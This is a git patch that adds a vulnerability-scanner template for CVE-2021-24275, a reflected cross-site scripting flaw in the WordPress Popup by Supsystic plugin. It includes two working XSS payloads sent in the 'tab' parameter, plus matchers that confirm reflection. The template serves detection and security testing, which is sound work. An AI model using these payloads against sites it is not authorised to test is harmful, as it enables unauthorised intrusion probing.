From ed8bc69c87314822c661327aa05043ed30f27453 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 Sep 2021 22:33:24 +0530 Subject: [PATCH] Create CVE-2021-24275.yaml --- cves/2021/CVE-2021-24275.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-24275.yaml diff --git a/cves/2021/CVE-2021-24275.yaml b/cves/2021/CVE-2021-24275.yaml new file mode 100644 index 0000000000..f9769d9d9b --- /dev/null +++ b/cves/2021/CVE-2021-24275.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-24275 + +info: + name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) + author: dhiyaneshDK + severity: low + reference: + - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f + tags: wordpress,cves,cve2021 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="onmouseover=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + + matchers-condition: and + matchers: + - type: word + words: + - 'alert(/XSS/)/' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header